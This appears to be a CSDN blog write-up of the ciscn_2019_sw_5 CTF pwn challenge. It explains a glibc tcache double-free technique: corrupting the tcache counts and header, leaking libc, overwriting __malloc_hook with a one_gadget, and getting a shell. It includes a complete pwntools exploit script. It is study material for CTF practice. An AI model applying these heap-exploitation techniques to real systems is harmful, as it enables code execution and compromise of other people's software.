ciscn_2019_sw_5(tcache下delete次数限制时的巧妙利用手法)

最新推荐文章于 2022-04-17 20:30:10 发布
最新推荐文章于 2022-04-17 20:30:10 发布
阅读量707 收藏 4
点赞数 3
分类专栏: pwn 二进制漏洞 CTF 文章标签: 安全 PWN CTF 二进制漏洞 UAF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/seaaseesa/article/details/105867464
版权
pwn 同时被 3 个专栏收录
161 篇文章 24 订阅
订阅专栏
二进制漏洞
161 篇文章 9 订阅
订阅专栏
CTF
161 篇文章 9 订阅
订阅专栏

ciscn_2019_sw_5(tcache下delete次数限制时的巧妙利用手法)

首先,检查一下程序的保护机制

然后,我们用IDA分析一下,仅两个功能

其中,delete功能只能用3次,delete功能没有清空指针,存在double free漏洞。

Add功能,size不可控,结尾printf可以输出堆内容。

我们可以利用add结尾的printf输出,main_arean地址,那么,我们需要得到unsorted bin才行。由于delete功能仅有3次机会。Glibc版本为2.23,存在tcache,因此,我们先利用2次,构造一个double free,然后分配到tcache 的表头,篡改对应size的chunk count为-1,同时篡改对应0x80的chunk头chunk指针为伪造的chunk地址,由于不知道堆地址,因此,我们需要爆破半个字节。

首先,申请三个堆

  #0
   add('t1','a')
   #1
   add('t2','b')
   #2前0x18字节将划给后面伪造的0x100的chunk
   fake_chunk = 'c'*0x8 + p64(0) + p64(0x61)
   add('t3',fake_chunk)

由于,我们要在0~2之间伪造一个0x100的chunk,因此,t3的前0x18字节划分给了伪造的chunk,而要想之后成功释放这个伪造的chunk,而不报错,我们还需要把后面剩余的部分修复好,因此,在t3里,我们修复剩余的空间为0x61的chunk。

接下来,double free,然后篡改next指针

   #double free
   delete(0)
   delete(0)
   #攻击tcache bin表头
   add('\x1E\x70','a')

接下来,第一次申请,申请到0原来的位置,我们开始伪造chunk

   #3伪造一个0x100的chunk,同时设置next指针仍然指向heap_base + 0x280,形成循环链表
   add('t1',p64(heap_base + 0x280) + p64(heap_base + 0x268) + p64(0x101) + p64(heap_base + 0x270))

我们伪造的chunk如上图,之所以这么伪造,是因为最后一次delete是要用来得到unsorted bin的,首先,当我们申请到0x280处时,0x100的tcache bin头变更为0x270。此时,我们delete掉0x100的伪造chunk后0x280处保留了main_arena地址。接下来我们申请0x270处,tcache bin头变更为0x268,我们填充数据到0x280,然后,就可以泄露出0x280处的main_arena值。接下来,我们申请到0x268,tcache bin头变更为0x280,然后我们从0x268处开始向后写数据,在0x280处写上malloc_hook的地址。此时,tcache链表的布局变成了

0x280——malloc_hook

因此,我们继续申请,就能申请到malloc_hook处,完成利用,十分巧妙。

   #4修改tcache bin表头,修改0x80的头为heap_base + 0x280
   payload = '\x00'*0x5A + p64(heap_base + 0x280)
   #修改0x100的count为-1
   add('\xFF',payload) #5
   #申请到heap_base + 0x280处即伪造chunk
   add('t1','a') #6
   #得到unsorted bin
   delete(6)
   add('a'*0x8,'a'*0x10)
   sh.recvuntil('a'*0x18)
   main_arena_xx = u64(sh.recv(6).ljust(8,'\x00'))

综上,完整的exp

#coding:utf8
from pwn import *

#context.log_level = 'debug'
libc = ELF('/lib/x86_64-linux-gnu/libc-2.27.so')
malloc_hook_s = libc.symbols['__malloc_hook']
one_gadget_s = 0x10a38c

def add(title,content):
   sh.sendlineafter('>>','1')
   sh.sendafter('title:',title)
   sh.sendafter('content:',content)

def delete(index):
   sh.sendlineafter('>>','2')
   sh.sendlineafter('index:',str(index))

def exploit():
   #0
   add('t1','a')
   #1
   add('t2','b')
   #2前0x18字节将划给后面伪造的0x100的chunk
   fake_chunk = 'c'*0x8 + p64(0) + p64(0x61)
   add('t3',fake_chunk)

   #double free
   delete(0)
   delete(0)
   #攻击tcache bin表头
   add('\x1E\x70','a')
   sh.recvuntil('\n')
   heap_base = u64(sh.recv(6).ljust(8,'\x00')) & (0xFFFFFFFFFFFFFF00)
   print 'heap_base=',hex(heap_base)
   #3伪造一个0x100的chunk,同时设置next指针仍然指向heap_base + 0x280,形成循环链表
   add('t1',p64(heap_base + 0x280) + p64(heap_base + 0x268) + p64(0x101) + p64(heap_base + 0x270))
   #4修改tcache bin表头,修改0x80的头为heap_base + 0x280
   payload = '\x00'*0x5A + p64(heap_base + 0x280)
   #修改0x100的count为-1
   add('\xFF',payload) #5
   #申请到heap_base + 0x280处即伪造chunk
   add('t1','a') #6
   #得到unsorted bin
   delete(6)
   add('a'*0x8,'a'*0x10)
   sh.recvuntil('a'*0x18)
   main_arena_xx = u64(sh.recv(6).ljust(8,'\x00'))
   malloc_hook_addr = (main_arena_xx & 0xFFFFFFFFFFFFF000) + (malloc_hook_s & 0xFFF)
   libc_base = malloc_hook_addr - malloc_hook_s
   if libc_base >> 40 != 0x7F:
      raise Exception('error leak!')
   one_gadget_addr = libc_base + one_gadget_s
   print 'libc_base=',hex(libc_base)
   print 'malloc_hook_addr=',hex(malloc_hook_addr)
   print 'one_gadget_addr=',hex(one_gadget_addr)
   #申请到heap_base+0x268处,覆盖0x280处的next指针
   add('a','a'*0x10 + p64(malloc_hook_addr))
   add('a','a')
   #改写malloc_hook
   add(p64(one_gadget_addr),'\x00')
   #getshell
   sh.sendlineafter('>>','1')

while True:
   try:
      global sh
      sh = process('./ciscn_2019_sw_5')
      #sh = remote('node3.buuoj.cn',29046)
      exploit()
      sh.interactive()
   except:
      sh.close()
      print 'trying...'
ha1vk
关注
  • 3
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
tcache利用方法
qq_39869547的博客
10-27 1588
tcache_perthread_struct结构体是用来管理tcache链表: 这个结构体位于heap段的起始位置,且有size:0x251 typedef struct tcache_perthread_struct { char counts[TCACHE_MAX_BINS];//数组长度64,每个元素最大为0x7,仅占用一个字节(对应64个tcache链表) tcache_entr...
buuctf ciscn_2019_sw_5
weixin_51480590的博客
08-11 488
ciscn_2019_sw_5题解
ciscn_2019_sw_7
doudoudedi
04-23 325
思路 堆溢出orztcache不要全部写坏不然难搞 exp: #!/usr/bin/python2 from pwn import * p=0 def pwn(ip,port,debug): global p if debug==1: p=process('./ciscn_2019_sw_7') elf=ELF('./ciscn_2019_sw_7') libc=elf.libc ...
swpuctf2019 p1KkHeap
qq_51687381的博客
04-17 167
做一下笔记。这道题的限制还是挺多的。版本不低不高2.27 限制: 1.Delete 3次限制 2.程序只能进行18次增删改查 3.有UAF和Double free 4.2.27不包含对tcache的double free 检查机制 5.exec被禁用。但是有一片可读可写的内存空间用以shellcode 要点: 1.通过double free 可以快速的从tcache bin 中绕过。 方法是:double free 同一块,此count为2。之后create3次相同大小的chunk。2-3
【技术分享】glibc 2.27-2.32版本下Tcache Struct的溢出利用 .pdf
09-05
【技术分享】glibc 2.27-2.32版本下的Tcache Struct溢出利用是一种高级的堆溢出漏洞利用技术,涉及到系统安全漏洞挖掘和应急响应。在这些glibc版本中,引入了Tcache(Thread-Cache)机制以提高内存分配的效率,但...
heap_exploit_2.31
03-21
堆攻击2.31 glibc 2.31版中有关ptmalloc的堆利用。 堆开发清单 在2.29和2.31之间进行堆利用技术,并收集有关相应利用技术的CTF挑战。... pwngdb是用于堆利用的出色gdb脚本,但是在glibc 2.31中,tcache结构发生了
TCache-开源
04-25
TCache是​​高性能键/值存储组件。 它可以轻松地插入到任何现有的高性能,分布式内存对象缓存系统(例如MemcacheD或Dynamo)中,从而通过减少数据库负载来加速动态Web应用程序
Glibc 2.27关于Tcache的增强保护 .pdf
09-05
这可以防止恶意攻击者通过创建大量缓存项来消耗资源,或者利用过度填充的Tcache进行攻击。这种限制使得Tcache的使用更加可控,增加了系统的安全性。 3. **tcache_put函数的改进**:在旧版本中,tcache_put函数直接...
一个用于学习各种堆利用技术的存储库。-C/C++开发
05-26
我们在一次hack会议上提出了这个想法,并实现了以下技术:文件技术Glib教育性堆利用开发此仓库用于学习各种堆利用技术。 我们在一次hack会议上提出了这个想法,并实现了以下技术:文件技术Glibc-Version适用的CTF...
linux_pwn(6)--tcache&&double free&&ciscn_2019_final_3
azraelxuemo的博客
03-10 1489
文章目录What is tcachepwn题例题检查代码分析add函数delete函数准备框架attack修改大小为unsorted bin范围free成unsorted bin难点,怎么泄露libcdouble free free_hook总结 What is tcache tcache是libc2.26之后引进的一种新机制,类似于fastbin一样的东西,每条链上最多可以有 7 个 chunk,free的候当tcache满了才放入fastbin,unsorted bin,malloc的候优先去tca
BUUCTF-PWN刷题记录-16
weixin_44145820的博客
05-05 705
目录ciscn_2019_es_5(realloc double free)npuctf_2020_easyheap(off-by-one) ciscn_2019_es_5(realloc double free) 申请没有大小限制,数目上限为10 edit会调用realloc重新申请(其实不会的,因为大小不变) 如果edit就不能show了 看了一下这题没有什么明显漏洞,但是考虑到re...
actf_2019_actfnote
doudoudedi
06-22 563
思路 通过溢出将topchunk的位置向上提然后申请堆块即可完成一次任意地址写入 exp: #!/usr/bin/python2 from pwn import * #p=process('./ACTF_2019_ACTFNOTE') p=remote('node3.buuoj.cn',26474) elf=ELF('./ACTF_2019_ACTFNOTE') libc=elf.libc def add(size,name,content): p.sendlineafter('$ ','1') p.
delete用法解析
热门推荐
huahualaly的博客
12-14 3万+
使用delete语句一次只能删除整行记录,不能删除某个字段。 与insert和update一样,删除一个表中的记录可能会导致与其他表的引用完整性问题,当对数据库进行修改一定要记着这一影响。 delete只会删除记录,不会删除表。如果要删除整张表,需要使用droptable命令。 如果要一次性清楚表中的数据,并且不需要撤销删除,可以使用truncate一次性对表数据进行清除。 delete语法如下: delete [from] table [where condition]; table指定要删除的表名称,
pwnciscn_2019_s_4
Nothing
03-06 758
main函数,存在八个字节溢出,栈迁移,第一次泄露ebp,得到栈上buf地址,迁移到buf即可。 from pwn import * io=remote('node3.buuoj.cn',28060) leave=0x8048562 sys_plt=0x8048400 pl1='a'*0x24+'bbbb' io.send(pl1) io.recvuntil('bbbb') ebp=u32(...
BUUCTF-PWN刷题记录-5(Tcache
weixin_44145820的博客
04-13 1302
目录ciscn_2019_final_3[V&N2020 公开赛]easyTHeap ciscn_2019_final_3 只有添加和删除两个功能 限制了申请的大小,最大为0x78,意味着chunk最大为0x80,添加完可以泄露堆上的地址 free之后没有置空,可以double free 题目分析差不多就这样,下面是漏洞利用: 先申请一个大小为0x78的heap[0],记录下返回地...
glibc2.29堆溢出tcache利用方式及原理
Hello World.c
03-06 8113
ibc2.29 堆溢出tcache利用方式及原理 Dancing With Heap 与堆共舞 二进制学习之旅 参考资料: ctf-pwn https://ctf-wiki.github.io/ctf-wiki/pwn/linux/glibc-heap/tcache_attack/#tcache-poisoning glibc wiki https://sourceware.org/glib...
glibc版本查看_GLIBC: heap basic2
weixin_39832875的博客
11-30 153
section 0 preface本文主要内容是glibc heap的fastbin,使用glibc-2.27版本。section I fastbin overview在引入tcache之后,fastbin的优先级仅次于tcachebin。fastbin由arena进行直接维护,因此arena中,即malloc_state中专门有一个指针数组fastbinY[],大小是10,可以存放10个链表,每...
Xman2018冬令营选拔赛arm-pwn
Peanuts
01-05 837
arm32-pwn从环境搭建到实战 关于arm的pwn还是比较令人头疼的,首先汇编比较难看懂,其次就是ida反编译出来的东西还会有错误,比如之后要讲的题目中栈的分布就和ida解析出来的完全不一样。那么先来看一看环境的搭建。之前有人发过完整的64的环境搭建,32的环境搭建和实战还是有一些不同的 环境搭建 环境的搭建应该是现在arm题目中比较麻烦的一个点。 安装qemu apt-get in...
linux下gdb最终显示tcache_get错误,会是什么原因?
最新发布
07-13
当使用GDB调试程序,如果最终显示 "tcache_get" 错误,可能是由于以下原因之一: 1. 未正确安装或配置glibc:GDB 是基于 glibc 的调试工具,如果 glibc 未正确安装或配置,可能会导致 tcache_get 错误。请确保...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值